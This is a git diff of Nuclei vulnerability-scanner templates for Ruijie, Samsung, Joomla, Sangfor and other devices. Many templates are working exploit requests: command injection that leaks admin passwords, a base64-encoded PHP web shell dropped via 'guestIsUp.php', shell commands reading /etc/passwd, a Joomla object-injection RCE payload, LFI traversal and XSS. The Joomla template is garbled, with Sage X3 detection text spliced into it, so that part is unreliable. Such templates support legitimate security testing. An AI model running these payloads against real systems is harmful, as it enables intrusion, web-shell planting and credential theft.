- - method: GET - path: - - "{{BaseURL}}" - matchers: - - type: regex - part: body - regex: - - 'R-SeeNet (.*)' - extractors: - - type: regex - group: 1 - regex: - - 'R-SeeNet (.*)' diff --git a/nuclei-templates/Other/rstudio-detect-9919.yaml b/nuclei-templates/Other/rstudio-detect.yaml similarity index 100% rename from nuclei-templates/Other/rstudio-detect-9919.yaml rename to nuclei-templates/Other/rstudio-detect.yaml diff --git a/nuclei-templates/Other/ruby-on-rails-framework-exceptions-9921.yaml b/nuclei-templates/Other/ruby-on-rails-framework-exceptions.yaml similarity index 100% rename from nuclei-templates/Other/ruby-on-rails-framework-exceptions-9921.yaml rename to nuclei-templates/Other/ruby-on-rails-framework-exceptions.yaml diff --git a/nuclei-templates/Other/ruijie-eg-password-leak-9922.yaml b/nuclei-templates/Other/ruijie-eg-password-leak-9922.yaml new file mode 100644 index 0000000000..2cd5c661e3 --- /dev/null +++ b/nuclei-templates/Other/ruijie-eg-password-leak-9922.yaml @@ -0,0 +1,45 @@ +id: ruijie-eg-password-leak + +info: + name: Ruijie EG Easy Gateway Password Leak + author: pikpikcu,pdteam + severity: high + description: Ruijie EG Easy Gateway login.php has CLI command injection, which leads to the disclosure of administrator account and password vulnerability + reference: + - http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20%E7%AE%A1%E7%90%86%E5%91%98%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html + - https://www.ruijienetworks.com + tags: ruijie,exposure + +requests: + - raw: + - | + POST /login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=admin&password=admin?show+webmaster+user + + matchers-condition: and + matchers: + - type: word + words: + - '"data":' + - '"status":1' + - 'admin' + condition: and + part: body + + - type: word + words: + - 'text/json' + part: header + + - type: status + status: + - 200 + + extractors: + - type: regex + group: 1 + regex: + - 'admin ([a-zA-Z0-9#@]+)",' \ No newline at end of file diff --git a/nuclei-templates/Other/ruijie-eg-password-leak-9924.yaml b/nuclei-templates/Other/ruijie-eg-password-leak-9924.yaml deleted file mode 100644 index d2050ac470..0000000000 --- a/nuclei-templates/Other/ruijie-eg-password-leak-9924.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: ruijie-eg-password-leak -info: - name: Ruijie EG Easy Gateway Password Leak - author: pikpikcu,pdteam - severity: high - description: Ruijie EG Easy Gateway login.php has CLI command injection, which leads to the disclosure of administrator account and password vulnerability - reference: - - http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20%E7%AE%A1%E7%90%86%E5%91%98%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html - - https://www.ruijienetworks.com - tags: ruijie,exposure -requests: - - raw: - - | - POST /login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username=admin&password=admin?show+webmaster+user - matchers-condition: and - matchers: - - type: word - words: - - '"data":' - - '"status":1' - - 'admin' - condition: and - part: body - - type: word - words: - - 'text/json' - part: header - - type: status - status: - - 200 - extractors: - - type: regex - group: 1 - regex: - - 'admin ([a-zA-Z0-9#@]+)",' diff --git a/nuclei-templates/Other/ruijie-eg-rce-9926.yaml b/nuclei-templates/Other/ruijie-eg-rce-9926.yaml deleted file mode 100644 index fc7ebb44a7..0000000000 --- a/nuclei-templates/Other/ruijie-eg-rce-9926.yaml +++ /dev/null @@ -1,55 +0,0 @@ -id: ruijie-eg-rce - -info: - name: Ruijie EG cli.php RCE - author: pikpikcu - severity: critical - description: A vulnerability in Ruikie EG's cli.php end point allows remote unauthenticated attackers to gain 'admin' privileges. The vulnerability is exploitable because an unauthenticated user can gain 'admin' privileges due to a vulnerability in the login screen. - reference: - - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md - - https://www.ruijienetworks.com - tags: ruijie,rce - -requests: - - raw: - - | - POST /login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username=admin&password=admin?show+webmaster+user - - - | - POST /login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username=admin&password={{admin}} - - - | - POST /cli.php?a=shell HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded;charset=UTF-8 - - notdelay=true&command=cat /etc/passwd - - cookie-reuse: true - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0" - - "nobody:.*:0:0" - part: body - - - type: status - status: - - 200 - - extractors: - - type: regex - name: admin - group: 1 - internal: true - regex: - - 'admin ([a-zA-Z0-9#@]+)",' \ No newline at end of file diff --git a/nuclei-templates/Other/ruijie-eg-rce-9927.yaml b/nuclei-templates/Other/ruijie-eg-rce-9927.yaml new file mode 100644 index 0000000000..236a2e9889 --- /dev/null +++ b/nuclei-templates/Other/ruijie-eg-rce-9927.yaml @@ -0,0 +1,56 @@ +id: ruijie-eg-rce + +info: + name: Ruijie EG cli.php RCE + author: pikpikcu + severity: critical + description: A vulnerability in Ruikie EG's cli.php end point allows remote unauthenticated attackers to gain 'admin' privileges. The vulnerability is exploitable because an unauthenticated user can gain 'admin' + privileges due to a vulnerability in the login screen. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md + - https://www.ruijienetworks.com + tags: ruijie,rce + +requests: + - raw: + - | + POST /login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=admin&password=admin?show+webmaster+user + + - | + POST /login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=admin&password={{admin}} + + - | + POST /cli.php?a=shell HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded;charset=UTF-8 + + notdelay=true&command=cat /etc/passwd + + cookie-reuse: true + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - "nobody:.*:0:0" + part: body + + - type: status + status: + - 200 + + extractors: + - type: regex + name: admin + group: 1 + internal: true + regex: + - 'admin ([a-zA-Z0-9#@]+)",' diff --git a/nuclei-templates/Other/ruijie-information-disclosure-9931.yaml b/nuclei-templates/Other/ruijie-information-disclosure-9931.yaml new file mode 100644 index 0000000000..8776f3ffb8 --- /dev/null +++ b/nuclei-templates/Other/ruijie-information-disclosure-9931.yaml @@ -0,0 +1,26 @@ +id: ruijie-information-disclosure + +info: + name: Ruijie Information Disclosure + author: pikpikcu + severity: high + reference: https://www.cnblogs.com/cHr1s/p/14499858.html + tags: ruijie,config,exposure + +requests: + - method: GET + path: + - '{{BaseURL}}/login.php' + + matchers-condition: and + matchers: + + - type: regex + regex: + - '"role":"super_admin","name":"(.*)","password":"(.*)"' + part: body + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/ruijie-information-disclosure-9932.yaml b/nuclei-templates/Other/ruijie-information-disclosure-9932.yaml deleted file mode 100644 index e7824e2a0b..0000000000 --- a/nuclei-templates/Other/ruijie-information-disclosure-9932.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: ruijie-information-disclosure -info: - name: Ruijie Information Disclosure - author: pikpikcu - severity: high - reference: https://www.cnblogs.com/cHr1s/p/14499858.html - tags: ruijie,config,exposure -requests: - - method: GET - path: - - '{{BaseURL}}/login.php' - matchers-condition: and - matchers: - - type: regex - regex: - - '"role":"super_admin","name":"(.*)","password":"(.*)"' - part: body - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/ruijie-networks-lfi-9938.yaml b/nuclei-templates/Other/ruijie-networks-lfi-9938.yaml new file mode 100644 index 0000000000..94f932e9bf --- /dev/null +++ b/nuclei-templates/Other/ruijie-networks-lfi-9938.yaml @@ -0,0 +1,31 @@ +id: ruijie-networks-lfi + +info: + name: Ruijie Networks Switch eWeb S29_RGOS 11.4 LFI + author: pikpikcu + severity: high + description: A vulnerability in Ruijie Networks Switch allows remote unauthenticated attackers to access locally stored files and retrieve their content via the 'download.do' endpoint. + reference: https://exploit-db.com/exploits/48755 + tags: ruijie,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/download.do?file=../../../../config.text" + matchers-condition: and + matchers: + + - type: word + words: + - 'filename="config.text"' + - "Content-Type: application/octet-stream" + part: header + - type: word + words: + - "version S29_RGOS 11.4" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/ruijie-networks-lfi.yaml b/nuclei-templates/Other/ruijie-networks-lfi.yaml deleted file mode 100644 index dbde5acb5f..0000000000 --- a/nuclei-templates/Other/ruijie-networks-lfi.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: ruijie-networks-lfi -info: - name: Ruijie Networks Switch eWeb S29_RGOS 11.4 LFI - author: pikpikcu - severity: high - reference: https://exploit-db.com/exploits/48755 - tags: ruijie,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/download.do?file=../../../../config.text" - matchers-condition: and - matchers: - - type: word - words: - - 'filename="config.text"' - - "Content-Type: application/octet-stream" - part: header - - type: word - words: - - "version S29_RGOS 11.4" - part: body - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/ruijie-networks-rce-9943.yaml b/nuclei-templates/Other/ruijie-networks-rce-9943.yaml new file mode 100644 index 0000000000..d638b89355 --- /dev/null +++ b/nuclei-templates/Other/ruijie-networks-rce-9943.yaml @@ -0,0 +1,31 @@ +id: ruijie-networks-rce +info: + name: Ruijie Networks-EWEB Network Management System RCE + author: pikpikcu + severity: critical + reference: + - https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py + - https://www.ruijienetworks.com + tags: ruijie,rce,network +requests: + - raw: + - | + POST /guest_auth/guestIsUp.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded;charset=UTF-8 + + ip=127.0.0.1|echo "PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K"|base64 -d > poc.php&mac=00-00 + - | + GET /guest_auth/poc.php?cmd=cat%20/etc/passwd HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded;charset=UTF-8 + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - "nobody:x:0:0:" + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/ruijie-networks-rce-9945.yaml b/nuclei-templates/Other/ruijie-networks-rce-9945.yaml deleted file mode 100644 index 2168911631..0000000000 --- a/nuclei-templates/Other/ruijie-networks-rce-9945.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: ruijie-networks-rce - -info: - name: Ruijie Networks-EWEB Network Management System RCE - author: pikpikcu - severity: critical - reference: - - https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py - - https://www.ruijienetworks.com # vendor homepage - tags: ruijie,rce,network - -requests: - - raw: - - | - POST /guest_auth/guestIsUp.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded;charset=UTF-8 - - ip=127.0.0.1|echo "PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K"|base64 -d > poc.php&mac=00-00 - - - | - GET /guest_auth/poc.php?cmd=cat%20/etc/passwd HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded;charset=UTF-8 - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0" - - "nobody:x:0:0:" - part: body - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/ruijie-phpinfo-9951.yaml b/nuclei-templates/Other/ruijie-phpinfo-9951.yaml index 5c71c9d59b..85111312a5 100644 --- a/nuclei-templates/Other/ruijie-phpinfo-9951.yaml +++ b/nuclei-templates/Other/ruijie-phpinfo-9951.yaml @@ -1,14 +1,17 @@ id: ruijie-phpinfo + info: name: Ruijie Phpinfo author: pikpikcu severity: low reference: https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20phpinfo.view.php%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md tags: phpinfo,rujjie,config,exposure,ruijie + requests: - method: GET path: - "{{BaseURL}}/tool/view/phpinfo.view.php" + matchers-condition: and matchers: - type: word @@ -16,6 +19,7 @@ requests: - "PHP Version" - "PHP Extension" condition: and + - type: status status: - 200 diff --git a/nuclei-templates/Other/ruijie-VPN-leakage.yaml b/nuclei-templates/Other/ruijie-vpn-leakage.yaml similarity index 100% rename from nuclei-templates/Other/ruijie-VPN-leakage.yaml rename to nuclei-templates/Other/ruijie-vpn-leakage.yaml diff --git a/nuclei-templates/Other/rusty-joomla-9955.yaml b/nuclei-templates/Other/rusty-joomla-9955.yaml new file mode 100644 index 0000000000..95fb637f1e --- /dev/null +++ b/nuclei-templates/Other/rusty-joomla-9955.yaml @@ -0,0 +1,51 @@ +id: rusty-joomla + +info: + name: Joomla! CMS <=3.4.6 - Remote Code Execution + author: leovalcante,kiks7 + severity: critical + description: | + Joomla! CMS 3.0.0 through the 3.4.6 release contains an unauthenticated PHP object injection that leads to remote code execution. + reference: + - https://blog.hacktivesecurity.com/index.php/2019/10/03/rusty-joomla-rce/ + - https://github.com/kiks7/rusty_joomla_rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cwe-id: CWE-77 + metadata: + max-request: 2 + tags: joomla,rce,unauth,php,cms,objectinjection + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0&password=AAA%22%3Bs%3A11%3A%22maonnalezzo%22%3BO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A7%3A%22print_r%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A40%3A%22http%3A%2F%2Frusty.jooml%2F%3Bpkwxhxqxmdkkmscotwvh%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7Ds%3A6%3A%22return%22%3Bs%3A102%3A&option=com_users&task=user.login&{{csrf}}=1 + + host-redirects: true + max-redirects: 2 + + extractors: + - type: regex + name: csrf + part: body + group: 1 + regex: + - "Sage X3" + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/sage-detect-9977.yaml b/nuclei-templates/Other/sage-detect-9977.yaml deleted file mode 100644 index 7948528b67..0000000000 --- a/nuclei-templates/Other/sage-detect-9977.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: sage-detect -info: - name: Sage X3 Detect - author: pikpikcu - severity: info - tags: tech,sage -requests: - - method: GET - path: - - "{{BaseURL}}/auth/login/page" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Sage X3" - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/saia-web-server-info-9980.yaml b/nuclei-templates/Other/saia-web-server-info-9980.yaml new file mode 100644 index 0000000000..36354a771d --- /dev/null +++ b/nuclei-templates/Other/saia-web-server-info-9980.yaml @@ -0,0 +1,21 @@ +id: saia-web-server +info: + name: Saia PCD Web-Server + author: DhiyaneshDk + severity: low + reference: + - https://www.exploit-db.com/ghdb/6865 + tags: config,exposure +requests: + - method: GET + path: + - "{{BaseURL}}/loadtextfile.htm#programinfo" + matchers-condition: and + matchers: + - type: word + words: + - "Saia PCD Web Server" + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/saia-web-server-info.yaml b/nuclei-templates/Other/saia-web-server-info.yaml deleted file mode 100644 index cdf7f8823b..0000000000 --- a/nuclei-templates/Other/saia-web-server-info.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: saia-web-server -info: - name: Saia PCD Web-Server - author: DhiyaneshDk - severity: low - reference: https://www.exploit-db.com/ghdb/6865 - tags: config,exposure -requests: - - method: GET - path: - - "{{BaseURL}}/loadtextfile.htm#programinfo" - matchers-condition: and - matchers: - - type: word - words: - - "Saia PCD Web Server" - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/salesforce-aura-9984.yaml b/nuclei-templates/Other/salesforce-aura-9984.yaml deleted file mode 100644 index 9d84bf4f6e..0000000000 --- a/nuclei-templates/Other/salesforce-aura-9984.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: salesforce-aura - -info: - name: Detect the exposure of Salesforce Lightning aura API - author: aaron_costello (@ConspiracyProof) - severity: info - reference: https://www.enumerated.de/index/salesforce - tags: aura,unauth,salesforce,exposure - -requests: - - method: POST - path: - - "{{BaseURL}}/aura" - - "{{BaseURL}}/s/sfsites/aura" - - "{{BaseURL}}/sfsites/aura" - - body: "{}" - - matchers: - - type: word - part: body - words: - - 'aura:invalidSession' diff --git a/nuclei-templates/Other/salesforce-aura.yaml b/nuclei-templates/Other/salesforce-aura.yaml new file mode 100644 index 0000000000..1fd9a804b6 --- /dev/null +++ b/nuclei-templates/Other/salesforce-aura.yaml @@ -0,0 +1,19 @@ +id: salesforce-aura +info: + name: Detect the exposure of Salesforce Lightning aura API + author: aaron_costello (@ConspiracyProof) + severity: info + reference: https://www.enumerated.de/index/salesforce + tags: aura,unauth,salesforce,exposure +requests: + - method: POST + path: + - "{{BaseURL}}/aura" + - "{{BaseURL}}/s/sfsites/aura" + - "{{BaseURL}}/sfsites/aura" + body: "{}" + matchers: + - type: word + part: body + words: + - 'aura:invalidSession' diff --git a/nuclei-templates/Other/samba-config-9987.yaml b/nuclei-templates/Other/samba-config-9987.yaml new file mode 100644 index 0000000000..b62e399c6a --- /dev/null +++ b/nuclei-templates/Other/samba-config-9987.yaml @@ -0,0 +1,20 @@ +id: samba-config +info: + name: Samba config file disclosure + author: sheikhrishad + severity: info + tags: config,exposure,smb,samba +requests: + - method: GET + path: + - "{{BaseURL}}/smb.conf" + matchers-condition: and + matchers: + - type: word + words: + - "configuration file" + - "samba" + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/samba-config.yaml b/nuclei-templates/Other/samba-config.yaml deleted file mode 100644 index b2d1dfd9d4..0000000000 --- a/nuclei-templates/Other/samba-config.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: samba-config -info: - name: Samba config file disclosure - author: sheikhrishad - severity: info - tags: config,exposure,smb -requests: - - method: GET - path: - - "{{BaseURL}}/smb.conf" - matchers-condition: and - matchers: - - type: word - words: - - "configuration file" - - "samba" - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/samba-detect-9989.yaml b/nuclei-templates/Other/samba-detect-9989.yaml deleted file mode 100644 index 433010b743..0000000000 --- a/nuclei-templates/Other/samba-detect-9989.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: samba-detection -info: - name: samba detection - author: pussycat0x - severity: info - tags: network,smb,samba -network: - - inputs: - - data: 000000a4ff534d4272000000000801400000000000000000000000000000400600000100008100025043204e4554574f524b2050524f4752414d20312e3000024d4943524f534f4654204e4554574f524b5320312e303300024d4943524f534f4654204e4554574f524b5320332e3000024c414e4d414e312e3000024c4d312e3258303032000253616d626100024e54204c414e4d414e20312e3000024e54204c4d20302e313200 - type: hex - host: - - "{{Hostname}}" - - "{{Host}}:139" - matchers: - - type: word - words: - - "SMBr" diff --git a/nuclei-templates/Other/samba-detect.yaml b/nuclei-templates/Other/samba-detect.yaml new file mode 100644 index 0000000000..1bd21fd9d7 --- /dev/null +++ b/nuclei-templates/Other/samba-detect.yaml @@ -0,0 +1,25 @@ +id: samba-detection +info: + name: Samba Detection + author: pussycat0x + severity: info + description: Samba is a free and open-source software that allows files to be shared across Windows and Linux systems simply and easily. + reference: + - https://www.samba.org/samba/what_is_samba.html + - https://www.samba.org/samba/history/security.html + classification: + cwe-id: CWE-200 + remediation: Always apply the latest security patch. + tags: network,smb,samba +network: + - inputs: + - data: 000000a4ff534d4272000000000801400000000000000000000000000000400600000100008100025043204e4554574f524b2050524f4752414d20312e3000024d4943524f534f4654204e4554574f524b5320312e303300024d4943524f534f4654204e4554574f524b5320332e3000024c414e4d414e312e3000024c4d312e3258303032000253616d626100024e54204c414e4d414e20312e3000024e54204c4d20302e313200 + type: hex + host: + - "{{Hostname}}" + - "{{Host}}:139" + matchers: + - type: word + words: + - "SMBr" +# Enhanced by mp on 2022/02/09 diff --git a/nuclei-templates/Other/samsung-printer-detect-9993.yaml b/nuclei-templates/Other/samsung-printer-detect-9993.yaml new file mode 100644 index 0000000000..d14f077216 --- /dev/null +++ b/nuclei-templates/Other/samsung-printer-detect-9993.yaml @@ -0,0 +1,24 @@ +id: samsung-printer-detect + +info: + name: SAMSUNG Printer Detection + author: pussycat0x + severity: info + tags: iot,panel,samsung,printer + metadata: + fofa-query: 'app="SAMSUNG-Printer"' + +requests: + - method: GET + path: + - "{{BaseURL}}/sws/index.html" + + matchers-condition: and + matchers: + - type: word + words: + - ' SyncThru Web Service ' + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/samsung-printer-detect.yaml b/nuclei-templates/Other/samsung-printer-detect.yaml deleted file mode 100644 index 883f060872..0000000000 --- a/nuclei-templates/Other/samsung-printer-detect.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: samsung-printer-detect -info: - name: SAMSUNG Printer Detection - author: pussycat0x - severity: info - tags: iot,panel,samsung,printer - metadata: - fofa-query: 'app="SAMSUNG-Printer"' -requests: - - method: GET - path: - - "{{BaseURL}}/sws/index.html" - matchers-condition: and - matchers: - - type: word - words: - - ' SyncThru Web Service ' - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/samsung-wlan-ap-lfi-10002.yaml b/nuclei-templates/Other/samsung-wlan-ap-lfi-10002.yaml new file mode 100644 index 0000000000..673f163363 --- /dev/null +++ b/nuclei-templates/Other/samsung-wlan-ap-lfi-10002.yaml @@ -0,0 +1,21 @@ +id: samsung-wlan-ap-lfi +info: + name: Samsung Wlan AP (WEA453e) LFI + author: pikpikcu + severity: critical + reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ + tags: xss,samsung,lfi +requests: + - method: GET + path: + - "{{BaseURL}}/(download)/etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - "bin:.*:1:1" + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/samsung-wlan-ap-lfi-9997.yaml b/nuclei-templates/Other/samsung-wlan-ap-lfi-9997.yaml deleted file mode 100644 index a6ebd70305..0000000000 --- a/nuclei-templates/Other/samsung-wlan-ap-lfi-9997.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: samsung-wlan-ap-lfi -info: - name: Samsung Wlan AP (WEA453e) LFI - author: pikpikcu - severity: critical - reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ - tags: xss,samsung,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/(download)/etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0" - - "bin:.*:1:1" - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/samsung-wlan-ap-rce-10010.yaml b/nuclei-templates/Other/samsung-wlan-ap-rce-10010.yaml new file mode 100644 index 0000000000..489d662045 --- /dev/null +++ b/nuclei-templates/Other/samsung-wlan-ap-rce-10010.yaml @@ -0,0 +1,22 @@ +id: samsung-wlan-ap-rce +info: + name: Samsung Wlan AP (WEA453e) RCE + author: pikpikcu + severity: critical + reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ + tags: xss,samsung,rce +requests: + - method: POST + path: + - "{{BaseURL}}/(download)/tmp/poc.txt" + body: "command1=shell%3Acat /etc/passwd|dd of=/tmp/poc.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[0*]:0:0" + - "bin:[x]:1:1" + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/samsung-wlan-ap-rce.yaml b/nuclei-templates/Other/samsung-wlan-ap-rce.yaml deleted file mode 100644 index 801ec50137..0000000000 --- a/nuclei-templates/Other/samsung-wlan-ap-rce.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: samsung-wlan-ap-rce - -info: - name: Samsung Wlan AP (WEA453e) RCE - author: pikpikcu - severity: critical - reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ - tags: xss,samsung,rce - -requests: - - method: POST - path: - - "{{BaseURL}}/(download)/tmp/poc.txt" - body: "command1=shell%3Acat /etc/passwd|dd of=/tmp/poc.txt" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0" - - "bin:.*:1:1" - part: body - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/samsung-wlan-ap-xss-10012.yaml b/nuclei-templates/Other/samsung-wlan-ap-xss-10012.yaml deleted file mode 100644 index bf5dd3aae4..0000000000 --- a/nuclei-templates/Other/samsung-wlan-ap-xss-10012.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: samsung-wlan-ap-xss -info: - name: Samsung Wlan AP (WEA453e) XSS - author: pikpikcu - severity: medium - reference: - - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ - tags: xss,samsung,xss -requests: - - method: GET - path: - - "{{BaseURL}}/%3Cscript%3Ealert(document.domain)%3C/script%3E" - matchers-condition: and - matchers: - - type: word - words: - - "/tmp/www/" - part: body - - type: status - status: - - 404 - - type: word - words: - - "text/html" - part: header diff --git a/nuclei-templates/Other/samsung-wlan-ap-xss.yaml b/nuclei-templates/Other/samsung-wlan-ap-xss.yaml new file mode 100644 index 0000000000..46cf066996 --- /dev/null +++ b/nuclei-templates/Other/samsung-wlan-ap-xss.yaml @@ -0,0 +1,24 @@ +id: samsung-wlan-ap-xss +info: + name: Samsung Wlan AP (WEA453e) XSS + author: pikpikcu + severity: medium + reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ + tags: xss,samsung,xss +requests: + - method: GET + path: + - "{{BaseURL}}/%3Cscript%3Ealert(document.domain)%3C/script%3E" + matchers-condition: and + matchers: + - type: word + words: + - "/tmp/www/" + part: body + - type: status + status: + - 404 + - type: word + words: + - "text/html" + part: header diff --git a/nuclei-templates/Other/sangfor-ba-rce(1).yaml b/nuclei-templates/Other/sangfor-ba-rce(1).yaml deleted file mode 100644 index de3c829d18..0000000000 --- a/nuclei-templates/Other/sangfor-ba-rce(1).yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: sangfor-ba-rce -info: - name: Sangfor BA - Remote Code Execution - author: ritikchaddha - severity: critical - description: | - A vulnerability in Sangfor product allows remote unauthenticated users to cause the product to execute arbitrary commands. - reference: - - https://mobile.twitter.com/sec715/status/1406886851072253953 - metadata: - verified: true - fofa-query: app="sangfor" - tags: rce,sangfor -requests: - - method: GET - path: - - "{{BaseURL}}/tool/log/c.php?strip_slashes=md5&host={{randstr}}" - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{{md5("{{randstr}}")}}' - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/sangfor-edr-auth-bypass-10022.yaml b/nuclei-templates/Other/sangfor-edr-auth-bypass-10022.yaml deleted file mode 100644 index 313272d6d7..0000000000 --- a/nuclei-templates/Other/sangfor-edr-auth-bypass-10022.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: sangfor-edr-auth-bypass -info: - name: Sangfor EDR Authentication Bypass - author: princechaddha - severity: high - description: A vulnerability in Sangfor EDR allows remote attackers to access the system with 'admin' privileges by accessing the login page directly 